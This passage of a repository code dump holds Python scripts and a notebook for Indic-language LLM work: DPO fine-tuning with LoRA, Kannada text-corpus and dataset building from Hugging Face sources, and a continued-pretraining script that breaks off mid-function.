optimizer_type: Optional[str] = field(default="paged_adamw_32bit", metadata={"help": "the optimizer type"})
per_device_train_batch_size: Optional[int] = field(default=4, metadata={"help": "train batch size per device"})
per_device_eval_batch_size: Optional[int] = field(default=1, metadata={"help": "eval batch size per device"})
gradient_accumulation_steps: Optional[int] = field(
default=4, metadata={"help": "the number of gradient accumulation steps"}
)
gradient_checkpointing: Optional[bool] = field(
default=True, metadata={"help": "whether to use gradient checkpointing"}
)
lora_alpha: Optional[float] = field(default=16, metadata={"help": "the lora alpha parameter"})
lora_dropout: Optional[float] = field(default=0.05, metadata={"help": "the lora dropout parameter"})
lora_r: Optional[int] = field(default=8, metadata={"help": "the lora r parameter"})
max_prompt_length: Optional[int] = field(default=512, metadata={"help": "the maximum prompt length"})
max_length: Optional[int] = field(default=1024, metadata={"help": "the maximum sequence length"})
    num_train_epochs: Optional[int] = field(default=1, metadata={"help": "max number of epochs to train"})
max_steps: Optional[int] = field(default=1000, metadata={"help": "max number of training steps"})
logging_steps: Optional[int] = field(default=1000, metadata={"help": "the logging frequency"})
save_steps: Optional[int] = field(default=1000, metadata={"help": "the saving frequency"})
eval_steps: Optional[int] = field(default=1000, metadata={"help": "the evaluation frequency"})
output_dir: Optional[str] = field(default="./results", metadata={"help": "the output directory"})
log_freq: Optional[int] = field(default=1, metadata={"help": "the logging frequency"})
# instrumentation
sanity_check: Optional[bool] = field(default=False, metadata={"help": "only train on 1000 samples"})
report_to: Optional[str] = field(
default="wandb",
metadata={
"help": 'The list of integrations to report the results and logs to. Supported platforms are `"azure_ml"`,'
'`"comet_ml"`, `"mlflow"`, `"neptune"`, `"tensorboard"`,`"clearml"` and `"wandb"`. '
'Use `"all"` to report to all integrations installed, `"none"` for no integrations.'
},
)
# debug argument for distributed training
ignore_bias_buffers: Optional[bool] = field(
default=False,
metadata={
"help": "fix for DDP issues with LM bias/mask buffers - invalid scalar type,`inplace operation. See"
"https://github.com/huggingface/transformers/issues/22482#issuecomment-1595790992"
},
)
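# A minimal launch sketch (flag names mirror the dataclass fields above; the
# model path, tokenizer and output directory are placeholders, not tested
# commands):
#   accelerate launch dpo.py \
#       --model_name_or_path ../sft/results/final_checkpoint \
#       --tokenizer_name_or_path Cognitive-Lab/Ambari-7B-Instruct-v0.1 \
#       --output_dir ./results --per_device_train_batch_size 4 --beta 0.1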
# def get_stack_exchange_paired(
# data_dir: str = "data/rl",
# sanity_check: bool = False,
# cache_dir: str = None,
# num_proc=24,
# ) -> Dataset:
# """Load the stack-exchange-paired dataset from Hugging Face and convert it to the necessary format.
# The dataset is converted to a dictionary with the following structure:
# {
# 'prompt': List[str],
# 'chosen': List[str],
# 'rejected': List[str],
# }
# Prompts are structured as follows:
# "Question: " + <prompt> + "\n\nAnswer: "
# """
# dataset = load_dataset(
# "lvwerra/stack-exchange-paired",
# split="train",
# cache_dir=cache_dir,
# data_dir=data_dir,
# )
# original_columns = dataset.column_names
# if sanity_check:
# dataset = dataset.select(range(min(len(dataset), 1000)))
# def return_prompt_and_responses(samples) -> Dict[str, str]:
# return {
# "prompt": ["Question: " + question + "\n\nAnswer: " for question in samples["question"]],
# "chosen": samples["response_j"],
# "rejected": samples["response_k"],
# }
# return dataset.map(
# return_prompt_and_responses,
# batched=True,
# num_proc=num_proc,
# remove_columns=original_columns,
# )
if __name__ == "__main__":
parser = HfArgumentParser(ScriptArguments)
script_args = parser.parse_args_into_dataclasses()[0]
# 1. load a pretrained model
model = LlamaForCausalLM.from_pretrained(
script_args.model_name_or_path,
torch_dtype=torch.float16,
# low_cpu_mem_usage=True,
# load_in_4bit=True,
)
model.config.use_cache = False
if script_args.ignore_bias_buffers:
# torch distributed hack
model._ddp_params_and_buffers_to_ignore = [
name for name, buffer in model.named_buffers() if buffer.dtype == torch.bool
]
model_ref = LlamaForCausalLM.from_pretrained(
script_args.model_name_or_path,
torch_dtype=torch.float16,
# low_cpu_mem_usage=True,
# load_in_4bit=True,
)
tokenizer = LlamaTokenizer.from_pretrained(script_args.tokenizer_name_or_path)
tokenizer.pad_token = tokenizer.eos_token
dataset = load_dataset("CognitiveLab/hh-rlhf-formatted-60000",split="train").train_test_split(test_size=0.2)
train_dataset = dataset["train"]
eval_dataset = dataset["test"]
# 2. Load the Stack-exchange paired dataset
# train_dataset = get_stack_exchange_paired(data_dir="data/rl", sanity_check=script_args.sanity_check)
# train_dataset = train_dataset.filter(
# lambda x: len(x["prompt"]) + len(x["chosen"]) <= script_args.max_length
# and len(x["prompt"]) + len(x["rejected"]) <= script_args.max_length
# )
# 3. Load evaluation dataset
# eval_dataset = get_stack_exchange_paired(data_dir="data/evaluation", sanity_check=True)
# eval_dataset = eval_dataset.filter(
# lambda x: len(x["prompt"]) + len(x["chosen"]) <= script_args.max_length
# and len(x["prompt"]) + len(x["rejected"]) <= script_args.max_length
# )
# 4. initialize training arguments:
training_args = TrainingArguments(
per_device_train_batch_size=script_args.per_device_train_batch_size,
per_device_eval_batch_size=script_args.per_device_eval_batch_size,
# max_steps=script_args.max_steps,
num_train_epochs=script_args.num_train_epochs,
logging_steps=script_args.logging_steps,
save_steps=script_args.save_steps,
gradient_accumulation_steps=script_args.gradient_accumulation_steps,
gradient_checkpointing=script_args.gradient_checkpointing,
learning_rate=script_args.learning_rate,
evaluation_strategy="steps",
eval_steps=script_args.eval_steps,
output_dir=script_args.output_dir,
report_to=script_args.report_to,
lr_scheduler_type=script_args.lr_scheduler_type,
warmup_steps=script_args.warmup_steps,
optim=script_args.optimizer_type,
bf16=True,
remove_unused_columns=False,
run_name="dpo_llama2",
)
peft_config = LoraConfig(
r=script_args.lora_r,
lora_alpha=script_args.lora_alpha,
lora_dropout=script_args.lora_dropout,
target_modules=[
"q_proj",
"v_proj",
"k_proj",
"out_proj",
"fc_in",
"fc_out",
"wte",
],
bias="none",
task_type="CAUSAL_LM",
)
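    # Note: target_modules mixes LLaMA-style names ("q_proj", "k_proj",
    # "v_proj") with GPT-style ones ("fc_in", "fc_out", "wte"); peft adapts
    # only the names it actually finds in the loaded model, so the unmatched
    # entries are expected to be ignored for a LLaMA-family checkpoint.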
# 5. initialize the DPO trainer
dpo_trainer = DPOTrainer(
model,
model_ref,
args=training_args,
beta=script_args.beta,
train_dataset=train_dataset,
eval_dataset=eval_dataset,
tokenizer=tokenizer,
peft_config=peft_config,
max_prompt_length=script_args.max_prompt_length,
max_length=script_args.max_length,
)
# 6. train
dpo_trainer.train()
dpo_trainer.save_model(script_args.output_dir)
# 7. save
output_dir = os.path.join(script_args.output_dir, "final_checkpoint")
dpo_trainer.model.save_pretrained(output_dir) | 9,332 | Python | .py | 202 | 40.282178 | 131 | 0.656618 | adithya-s-k/Indic-llm | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,516 | generate_text_corpus.py | adithya-s-k_Indic-llm/archives/dataset/generate_text_corpus.py | import argparse
import logging
import os
import pandas as pd
from datasets import load_dataset
from tqdm import tqdm
logging.basicConfig(
level=logging.INFO,
format="%(asctime)s - %(name)s - %(levelname)s - %(message)s",
)
logger = logging.getLogger(__name__)
class CorpusCreator:
def __init__(self):
self.output_dir = "./corpus"
def create_sentence_corpus(
self,
hf_dataset,
hf_corpus_path,
text_col,
dataset_split="train",
output_file_name="kannada_sentence_corpus.txt",
):
        try:
            dataset = load_dataset(hf_dataset, hf_corpus_path, split=dataset_split)
            train_df = pd.DataFrame(dataset)
            os.makedirs(self.output_dir, exist_ok=True)
            corpus_path = os.path.join(self.output_dir, output_file_name)
            # utf-8 is required for Indic scripts such as Kannada
            with open(corpus_path, "w", encoding="utf-8") as file:
                for index, value in tqdm(
                    train_df[text_col].items(), total=len(train_df)
                ):
                    file.write(str(value) + "\n")
        except Exception as e:
            logger.error(f"Error creating the text corpus -> {e}")
            return None
        return corpus_path
def run(self):
parser = argparse.ArgumentParser(
description="Create a sentence corpus from a Hugging Face dataset."
)
parser.add_argument(
"--hf-dataset",
required=True,
help="Name of the Hugging Face dataset (e.g., 'imdb').",
)
parser.add_argument(
"--hf-corpus-path",
required=False,
help="Name of the path to language inside the dataset"
)
parser.add_argument(
"--text-col",
required=True,
help="Name of the text column in the dataset.",
)
parser.add_argument(
"--dataset-split",
default="train",
help="Dataset split to use (default: 'train').",
)
parser.add_argument(
"--output-file-name",
default="kannada_sentence_corpus.txt",
help="Name of the output corpus file (default: 'kannda_sentence_corpus.txt').",
)
args = parser.parse_args()
self.create_sentence_corpus(
args.hf_dataset, args.hf_corpus_path, args.text_col, args.dataset_split, args.output_file_name
)
if __name__ == "__main__":
corpus_creator = CorpusCreator()
corpus_creator.run()
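# Example invocation (dataset, subset and column names are illustrative):
#   python generate_text_corpus.py \
#       --hf-dataset wikimedia/wikipedia --hf-corpus-path 20231101.kn \
#       --text-col text --output-file-name kannada_sentence_corpus.txt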
| 2,474 | Python | .py | 71 | 25.492958 | 106 | 0.575314 | adithya-s-k/Indic-llm | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,517 | generate_dataset.ipynb | adithya-s-k_Indic-llm/archives/dataset/generate_dataset.ipynb | {
"cells": [
{
"cell_type": "code",
"execution_count": null,
"metadata": {},
"outputs": [],
"source": [
"!pip install ipywidgets"
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {},
"outputs": [],
"source": [
"from huggingface_hub import notebook_login\n",
"from datasets import load_dataset\n",
"notebook_login()"
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {},
"outputs": [],
"source": [
"import json\n",
"import os\n",
"import pandas as pd\n",
"from datasets import load_dataset\n",
"from tqdm import tqdm\n",
"\n",
"# Create the \"output\" folder if it doesn't exist\n",
"output_folder = \"output\"\n",
"os.makedirs(output_folder, exist_ok=True)\n",
"\n",
"dataset_list = [\n",
" {\"hf_datasets\": \"wikimedia/wikipedia\", \"hf_corpus_paths\": \"20231101.kn\"},\n",
" {\"hf_datasets\": \"mc4\", \"hf_corpus_paths\": \"kn\"},\n",
" {\"hf_datasets\": \"uonlp/CulturaX\", \"hf_corpus_paths\": \"kn\"},\n",
"]\n",
"all_data_points = [] # List to store all data points\n",
"\n",
"for dataset_config in dataset_list:\n",
" hf_datasets = dataset_config[\"hf_datasets\"]\n",
" hf_corpus_paths = dataset_config[\"hf_corpus_paths\"]\n",
"\n",
" dataset_identifier = hf_datasets.split(\"/\")[-1] # Consider only the right half after '/'\n",
"\n",
" dataset = load_dataset(hf_datasets, hf_corpus_paths, split=\"train\", trust_remote_code=True)\n",
"\n",
" current_data_points = [] # List to store data points from the current dataset\n",
"\n",
" for data_point in dataset:\n",
" text = data_point[\"text\"]\n",
" source = dataset_identifier # Use the modified dataset identifier\n",
"\n",
" json_entry = {\n",
" \"text\": text,\n",
" \"source\": source\n",
" }\n",
"\n",
" current_data_points.append(json_entry) # Add the data point to the current dataset list\n",
" all_data_points.append(json_entry) # Add the data point to the overall list\n",
"\n",
" # Save the data points from the current dataset to a JSON file in the \"output\" folder\n",
" output_file_path = os.path.join(output_folder, f\"{dataset_identifier}_output.json\")\n",
" with open(output_file_path, \"w\", encoding=\"utf-8\") as json_file:\n",
" json.dump(current_data_points, json_file, ensure_ascii=False, indent=2)\n",
"\n",
" print(f\"Data points from {dataset_identifier} saved to {output_file_path}\")\n",
"\n",
"# Save the overall list of data points to a final JSON file in the \"output\" folder\n",
"final_output_file_path = os.path.join(output_folder, \"all_data_points_output.json\")\n",
"with open(final_output_file_path, \"w\", encoding=\"utf-8\") as json_file:\n",
" json.dump(all_data_points, json_file, ensure_ascii=False, indent=2)\n",
"\n",
"print(f\"All data points saved to {final_output_file_path}\")\n"
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {},
"outputs": [],
"source": [
"dataset = load_dataset('json', data_files='./output/wikipedia_output.json' , split='train')"
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {},
"outputs": [],
"source": [
"print(dataset['text'][:10])"
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {},
"outputs": [],
"source": [
"dataset.push_to_hub(\"CognitiveLab/Project_K_TrainDataset_Small\" ,private=True)"
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {},
"outputs": [],
"source": []
}
],
"metadata": {
"kernelspec": {
"display_name": "training-venv",
"language": "python",
"name": "python3"
},
"language_info": {
"codemirror_mode": {
"name": "ipython",
"version": 3
},
"file_extension": ".py",
"mimetype": "text/x-python",
"name": "python",
"nbconvert_exporter": "python",
"pygments_lexer": "ipython3",
"version": "3.9.18"
}
},
"nbformat": 4,
"nbformat_minor": 2
}
| 4,260 | Python | .py | 139 | 26.467626 | 106 | 0.566367 | adithya-s-k/Indic-llm | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,518 | pretrain-gemma.py | adithya-s-k_Indic-llm/archives/pretraining/pretrain-gemma.py | #!/usr/bin/env python
# coding=utf-8
# Copyright 2020 The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Fine-tuning the library models for causal language modeling (GPT, GPT-2, CTRL, ...) on a text file or a dataset.
Here is the full list of checkpoints on the hub that can be fine-tuned by this script:
https://huggingface.co/models?filter=text-generation
"""
# You can also adapt this script on your own causal language modeling task. Pointers for this are left as comments.
import logging
import numpy as np
import math
import os
import sys
from dataclasses import dataclass, field
from itertools import chain
from typing import Optional, List, Dict, Any, Mapping
from pathlib import Path
import datasets
import torch
from datasets import load_dataset, concatenate_datasets
import transformers
from transformers import (
CONFIG_MAPPING,
MODEL_FOR_CAUSAL_LM_MAPPING,
AutoConfig,
AutoModelForCausalLM,
LlamaForCausalLM,
LlamaTokenizer,
AutoTokenizer,
HfArgumentParser,
Trainer,
TrainingArguments,
is_torch_tpu_available,
set_seed,
)
from transformers.testing_utils import CaptureLogger
from transformers.trainer_utils import get_last_checkpoint
from transformers.utils import send_example_telemetry
from transformers.utils.versions import require_version
from sklearn.metrics import accuracy_score
from peft import LoraConfig, TaskType, get_peft_model, PeftModel, get_peft_model_state_dict
from transformers.trainer_utils import PREFIX_CHECKPOINT_DIR
class SavePeftModelCallback(transformers.TrainerCallback):
def save_model(self, args, state, kwargs):
if state.best_model_checkpoint is not None:
checkpoint_folder = os.path.join(state.best_model_checkpoint, "pt_lora_model")
else:
checkpoint_folder = os.path.join(args.output_dir, f"{PREFIX_CHECKPOINT_DIR}-{state.global_step}")
peft_model_path = os.path.join(checkpoint_folder, "pt_lora_model")
kwargs["model"].save_pretrained(peft_model_path)
kwargs["tokenizer"].save_pretrained(peft_model_path)
def on_save(self, args, state, control, **kwargs):
self.save_model(args, state, kwargs)
return control
def on_train_end(self, args, state, control, **kwargs):
peft_model_path = os.path.join(args.output_dir, "pt_lora_model")
kwargs["model"].save_pretrained(peft_model_path)
kwargs["tokenizer"].save_pretrained(peft_model_path)
def accuracy(predictions, references, normalize=True, sample_weight=None):
return {
"accuracy": float(
accuracy_score(references, predictions, normalize=normalize, sample_weight=sample_weight)
)
}
def compute_metrics(eval_preds):
preds, labels = eval_preds
# preds have the same shape as the labels, after the argmax(-1) has been calculated
# by preprocess_logits_for_metrics but we need to shift the labels
labels = labels[:, 1:].reshape(-1)
preds = preds[:, :-1].reshape(-1)
return accuracy(predictions=preds, references=labels)
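# Toy illustration of the shift above (made-up values): for a single sequence,
#   labels = [[l0, l1, l2]]  ->  references  [l1, l2]
#   preds  = [[p0, p1, p2]]  ->  predictions [p0, p1]
# so each position's prediction is scored against the next token's label,
# matching the causal-LM objective.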
def preprocess_logits_for_metrics(logits, labels):
if isinstance(logits, tuple):
# Depending on the model and config, logits may contain extra tensors,
# like past_key_values, but logits always come first
logits = logits[0]
return logits.argmax(dim=-1)
def fault_tolerance_data_collator(features: List) -> Dict[str, Any]:
if not isinstance(features[0], Mapping):
features = [vars(f) for f in features]
first = features[0]
batch = {}
# Special handling for labels.
# Ensure that tensor is created with the correct type
# (it should be automatically the case, but let's make sure of it.)
if "label" in first and first["label"] is not None:
label = first["label"].item() if isinstance(first["label"], torch.Tensor) else first["label"]
dtype = torch.long if isinstance(label, int) else torch.float
batch["labels"] = torch.tensor([f["label"] for f in features], dtype=dtype)
elif "label_ids" in first and first["label_ids"] is not None:
if isinstance(first["label_ids"], torch.Tensor):
batch["labels"] = torch.stack([f["label_ids"] for f in features])
else:
dtype = torch.long if isinstance(first["label_ids"][0], int) else torch.float
batch["labels"] = torch.tensor([f["label_ids"] for f in features], dtype=dtype)
# Handling of all other possible keys.
# Again, we will use the first element to figure out which key/values are not None for this model.
try:
for k, v in first.items():
if k not in ("label", "label_ids") and v is not None and not isinstance(v, str):
if isinstance(v, torch.Tensor):
batch[k] = torch.stack([f[k] for f in features])
elif isinstance(v, np.ndarray):
batch[k] = torch.tensor(np.stack([f[k] for f in features]))
else:
batch[k] = torch.tensor([f[k] for f in features])
except ValueError: # quick fix by simply take the first example
for k, v in first.items():
if k not in ("label", "label_ids") and v is not None and not isinstance(v, str):
if isinstance(v, torch.Tensor):
batch[k] = torch.stack([features[0][k]] * len(features))
elif isinstance(v, np.ndarray):
batch[k] = torch.tensor(np.stack([features[0][k]] * len(features)))
else:
batch[k] = torch.tensor([features[0][k]] * len(features))
return batch
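# Sketch of the collator contract (shapes assumed, not enforced): it receives
#   features = [{"input_ids": [t0, ..., tN], "labels": [t0, ..., tN]}, ...]
# and returns
#   {"input_ids": LongTensor[batch, N+1], "labels": LongTensor[batch, N+1]}
# The ValueError fallback repeats the first example across the batch so that a
# single malformed row cannot crash a long pre-training run.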
MODEL_CONFIG_CLASSES = list(MODEL_FOR_CAUSAL_LM_MAPPING.keys())
MODEL_TYPES = tuple(conf.model_type for conf in MODEL_CONFIG_CLASSES)
@dataclass
class ModelArguments:
"""
Arguments pertaining to which model/config/tokenizer we are going to fine-tune, or train from scratch.
"""
model_name_or_path: Optional[str] = field(
default=None,
metadata={
"help": (
"The model checkpoint for weights initialization.Don't set if you want to train a model from scratch."
)
},
)
tokenizer_name_or_path: Optional[str] = field(
default=None,
metadata={
"help": (
"The tokenizer for weights initialization.Don't set if you want to train a model from scratch."
)
},
)
model_type: Optional[str] = field(
default=None,
metadata={"help": "If training from scratch, pass a model type from the list: " + ", ".join(MODEL_TYPES)},
)
config_overrides: Optional[str] = field(
default=None,
metadata={
"help": (
"Override some existing default config settings when a model is trained from scratch. Example: "
"n_embd=10,resid_pdrop=0.2,scale_attn_weights=false,summary_type=cls_index"
)
},
)
config_name: Optional[str] = field(
default=None, metadata={"help": "Pretrained config name or path if not the same as model_name"}
)
tokenizer_name: Optional[str] = field(
default=None, metadata={"help": "Pretrained tokenizer name or path if not the same as model_name"}
)
cache_dir: Optional[str] = field(
default=None,
metadata={"help": "Where do you want to store the pretrained models downloaded from huggingface.co"},
)
use_fast_tokenizer: bool = field(
default=True,
metadata={"help": "Whether to use one of the fast tokenizer (backed by the tokenizers library) or not."},
)
model_revision: str = field(
default="main",
metadata={"help": "The specific model version to use (can be a branch name, tag name or commit id)."},
)
use_auth_token: bool = field(
default=False,
metadata={
"help": (
"Will use the token generated when running `huggingface-cli login` (necessary to use this script "
"with private models)."
)
},
)
torch_dtype: Optional[str] = field(
default=None,
metadata={
"help": (
"Override the default `torch.dtype` and load the model under this dtype. If `auto` is passed, the "
"dtype will be automatically derived from the model's weights."
),
"choices": ["auto", "bfloat16", "float16", "float32"],
},
)
def __post_init__(self):
if self.config_overrides is not None and (self.config_name is not None or self.model_name_or_path is not None):
raise ValueError(
"--config_overrides can't be used in combination with --config_name or --model_name_or_path"
)
@dataclass
class DataTrainingArguments:
"""
Arguments pertaining to what data we are going to input our model for training and eval.
"""
dataset_dir: Optional[str] = field(
default=None, metadata={"help": "The name of the dataset to use (via the datasets library)."}
)
dataset_config_name: Optional[str] = field(
default=None, metadata={"help": "The configuration name of the dataset to use (via the datasets library)."}
)
train_file: Optional[str] = field(default=None, metadata={"help": "The input training data file (a text file)."})
validation_file: Optional[str] = field(
default=None,
metadata={"help": "An optional input evaluation data file to evaluate the perplexity on (a text file)."},
)
max_train_samples: Optional[int] = field(
default=None,
metadata={
"help": (
"For debugging purposes or quicker training, truncate the number of training examples to this "
"value if set."
)
},
)
max_eval_samples: Optional[int] = field(
default=None,
metadata={
"help": (
"For debugging purposes or quicker training, truncate the number of evaluation examples to this "
"value if set."
)
},
)
streaming: bool = field(default=False, metadata={"help": "Enable streaming mode"})
block_size: Optional[int] = field(
default=None,
metadata={
"help": (
"Optional input sequence length after tokenization. "
"The training dataset will be truncated in block of this size for training. "
"Default to the model max input length for single sentence inputs (take into account special tokens)."
)
},
)
overwrite_cache: bool = field(
default=False, metadata={"help": "Overwrite the cached training and evaluation sets"}
)
validation_split_percentage: Optional[float] = field(
default=0.05,
metadata={
"help": "The percentage of the train set used as validation set in case there's no validation split"
},
)
preprocessing_num_workers: Optional[int] = field(
default=None,
metadata={"help": "The number of processes to use for the preprocessing."},
)
keep_linebreaks: bool = field(
default=True, metadata={"help": "Whether to keep line breaks when using TXT files or not."}
)
data_cache_dir: Optional[str] = field(default="./", metadata={"help": "The datasets processed stored"})
def __post_init__(self):
if self.streaming:
require_version("datasets>=2.0.0", "The streaming feature requires `datasets>=2.0.0`")
@dataclass
class MyTrainingArguments(TrainingArguments):
    trainable: Optional[str] = field(default="q_proj,v_proj")
    lora_rank: Optional[int] = field(default=8)
    lora_dropout: Optional[float] = field(default=0.1)
    lora_alpha: Optional[float] = field(default=32.)
    modules_to_save: Optional[str] = field(default=None)
    debug_mode: Optional[bool] = field(default=False)
    peft_path: Optional[str] = field(default=None)
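# A minimal launch sketch (model, tokenizer and paths are placeholders; flag
# names mirror the dataclasses above):
#   torchrun --nproc_per_node=1 pretrain-gemma.py \
#       --model_name_or_path google/gemma-7b \
#       --tokenizer_name_or_path <extended-tokenizer> \
#       --dataset_dir ./corpus --data_cache_dir ./cache \
#       --do_train --output_dir ./output --block_size 1024 \
#       --trainable "q_proj,v_proj" --lora_rank 8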
logger = logging.getLogger(__name__)
def main():
parser = HfArgumentParser((ModelArguments, DataTrainingArguments, MyTrainingArguments))
if len(sys.argv) == 2 and sys.argv[1].endswith(".json"):
# If we pass only one argument to the script and it's the path to a json file,
# let's parse it to get our arguments.
model_args, data_args, training_args = parser.parse_json_file(json_file=os.path.abspath(sys.argv[1]))
else:
model_args, data_args, training_args = parser.parse_args_into_dataclasses()
# Sending telemetry. Tracking the example usage helps us better allocate resources to maintain them. The
# information sent is the one passed as arguments along with your Python/PyTorch versions.
send_example_telemetry("run_clm", model_args, data_args)
# Setup logging
    logging.basicConfig(
        format="%(asctime)s - %(levelname)s - %(name)s - %(message)s",
        datefmt="%m/%d/%Y %H:%M:%S",
        level=logging.INFO,  # if training_args.local_rank in [-1, 0] else logging.WARN,
        handlers=[logging.StreamHandler(sys.stdout)],
    )
if training_args.should_log:
# The default of training_args.log_level is passive, so we set log level at info here to have that default.
transformers.utils.logging.set_verbosity_info()
log_level = training_args.get_process_log_level()
logger.setLevel(log_level)
datasets.utils.logging.set_verbosity(log_level)
transformers.utils.logging.set_verbosity(log_level)
transformers.utils.logging.enable_default_handler()
transformers.utils.logging.enable_explicit_format()
# transformers.tokenization_utils.logging.set_verbosity_warning()
# Log on each process the small summary:
    logger.warning(
        f"Process rank: {training_args.local_rank}, device: {training_args.device}, n_gpu: {training_args.n_gpu}, "
        + f"distributed training: {bool(training_args.local_rank != -1)}, 16-bits training: {training_args.fp16}"
    )
# Detecting last checkpoint.
last_checkpoint = None
if os.path.isdir(training_args.output_dir) and training_args.do_train and not training_args.overwrite_output_dir:
last_checkpoint = get_last_checkpoint(training_args.output_dir)
if last_checkpoint is None and len(os.listdir(training_args.output_dir)) > 0:
raise ValueError(
f"Output directory ({training_args.output_dir}) already exists and is not empty. "
"Use --overwrite_output_dir to overcome."
)
elif last_checkpoint is not None and training_args.resume_from_checkpoint is None:
logger.info(
f"Checkpoint detected, resuming training at {last_checkpoint}. To avoid this behavior, change "
"the `--output_dir` or add `--overwrite_output_dir` to train from scratch."
)
# Set seed before initializing model.
set_seed(training_args.seed)
config_kwargs = {
"cache_dir": model_args.cache_dir,
"revision": model_args.model_revision,
"use_auth_token": True if model_args.use_auth_token else None,
}
if model_args.config_name:
config = AutoConfig.from_pretrained(model_args.config_name, **config_kwargs)
elif model_args.model_name_or_path:
config = AutoConfig.from_pretrained(model_args.model_name_or_path, **config_kwargs)
else:
config = CONFIG_MAPPING[model_args.model_type]()
logger.warning("You are instantiating a new config instance from scratch.")
if model_args.config_overrides is not None:
logger.info(f"Overriding config: {model_args.config_overrides}")
config.update_from_string(model_args.config_overrides)
logger.info(f"New config: {config}")
tokenizer_kwargs = {
"cache_dir": model_args.cache_dir,
"use_fast": model_args.use_fast_tokenizer,
"revision": model_args.model_revision,
"use_auth_token": True if model_args.use_auth_token else None,
}
if model_args.tokenizer_name:
tokenizer = AutoTokenizer.from_pretrained(model_args.tokenizer_name, **tokenizer_kwargs)
elif model_args.tokenizer_name_or_path:
tokenizer = AutoTokenizer.from_pretrained(model_args.tokenizer_name_or_path, **tokenizer_kwargs)
else:
raise ValueError(
"You are instantiating a new tokenizer from scratch. This is not supported by this script."
"You can do it from another script, save it, and load it from here, using --tokenizer_name."
)
# Preprocessing the datasets.
# First we tokenize all the texts.
# since this will be pickled to avoid _LazyModule error in Hasher force logger loading before tokenize_function
tok_logger = transformers.utils.logging.get_logger("transformers.tokenization_utils_base")
def tokenize_function(examples):
with CaptureLogger(tok_logger) as cl:
output = tokenizer(examples["text"])
# clm input could be much much longer than block_size
if "Token indices sequence length is longer than the" in cl.out:
tok_logger.warning(
"^^^^^^^^^^^^^^^^ Please ignore the warning above - this long input will be chunked into smaller bits"
" before being passed to the model."
)
return output
if data_args.block_size is None:
block_size = tokenizer.model_max_length
if block_size > 1024:
logger.warning(
"The chosen tokenizer supports a `model_max_length` that is longer than the default `block_size` value"
" of 1024. If you would like to use a longer `block_size` up to `tokenizer.model_max_length` you can"
" override this default with `--block_size xxx`."
)
block_size = 1024
else:
if data_args.block_size > tokenizer.model_max_length:
logger.warning(
f"The block_size passed ({data_args.block_size}) is larger than the maximum length for the model"
f"({tokenizer.model_max_length}). Using block_size={tokenizer.model_max_length}."
)
block_size = min(data_args.block_size, tokenizer.model_max_length)
# Main data processing function that will concatenate all texts from our dataset and generate chunks of block_size.
def group_texts(examples):
# Concatenate all texts.
concatenated_examples = {k: list(chain(*examples[k])) for k in examples.keys()}
total_length = len(concatenated_examples[list(examples.keys())[0]])
# We drop the small remainder, we could add padding if the model supported it instead of this drop, you can
# customize this part to your needs.
if total_length >= block_size:
total_length = (total_length // block_size) * block_size
# Split by chunks of max_len.
result = {
k: [t[i : i + block_size] for i in range(0, total_length, block_size)]
for k, t in concatenated_examples.items()
}
result["labels"] = result["input_ids"].copy()
return result
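    # Worked example of group_texts (block_size=4, toy token ids): rows
    # [1, 2, 3] and [4, 5, 6, 7, 8] concatenate to [1..8] and are re-split
    # into [1, 2, 3, 4] and [5, 6, 7, 8]; a trailing remainder shorter than
    # block_size is dropped.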
with training_args.main_process_first(desc="dataset map tokenization and grouping"):
lm_datasets = []
path = Path(data_args.dataset_dir)
files = [file.name for file in path.glob("*.txt")]
if training_args.debug_mode is True:
files = [files[0]]
for idx, file in enumerate(files):
data_file = os.path.join(path, file)
filename = ''.join(file.split(".")[:-1])
cache_path = os.path.join(data_args.data_cache_dir, filename)
os.makedirs(cache_path, exist_ok=True)
try:
processed_dataset = datasets.load_from_disk(cache_path, keep_in_memory=False)
                logger.info(f'training dataset {filename} has been loaded from disk')
except Exception:
cache_dir = os.path.join(data_args.data_cache_dir, filename+"_text")
os.makedirs(cache_dir, exist_ok=True)
raw_dataset = load_dataset("text", data_files=data_file, cache_dir=cache_dir, keep_in_memory=False)
logger.info(f"{file} has been loaded")
tokenized_dataset = raw_dataset.map(
tokenize_function,
batched=True,
num_proc=data_args.preprocessing_num_workers,
remove_columns="text",
load_from_cache_file=True,
keep_in_memory=False,
cache_file_names = {k: os.path.join(cache_dir, 'tokenized.arrow') for k in raw_dataset},
desc="Running tokenizer on dataset",
)
grouped_datasets = tokenized_dataset.map(
group_texts,
batched=True,
num_proc=data_args.preprocessing_num_workers,
load_from_cache_file=True,
keep_in_memory=False,
cache_file_names = {k: os.path.join(cache_dir, 'grouped.arrow') for k in tokenized_dataset},
desc=f"Grouping texts in chunks of {block_size}",
)
processed_dataset = grouped_datasets
processed_dataset.save_to_disk(cache_path)
if idx == 0:
lm_datasets = processed_dataset['train']
else:
assert lm_datasets.features.type == processed_dataset["train"].features.type
lm_datasets = concatenate_datasets([lm_datasets, processed_dataset["train"]])
lm_datasets = lm_datasets.train_test_split(test_size = data_args.validation_split_percentage)
if training_args.do_train:
train_dataset = lm_datasets['train']
if data_args.max_train_samples is not None:
max_train_samples = min(len(train_dataset), data_args.max_train_samples)
train_dataset = train_dataset.select(range(max_train_samples))
logger.info(f"Num train_samples {len(train_dataset)}")
logger.info("training example:")
logger.info(tokenizer.decode(train_dataset[0]['input_ids']))
if training_args.do_eval:
eval_dataset = lm_datasets["test"]
if data_args.max_eval_samples is not None:
max_eval_samples = min(len(eval_dataset), data_args.max_eval_samples)
eval_dataset = eval_dataset.select(range(max_eval_samples))
logger.info(f"Num eval_samples {len(eval_dataset)}")
logger.info("training example:")
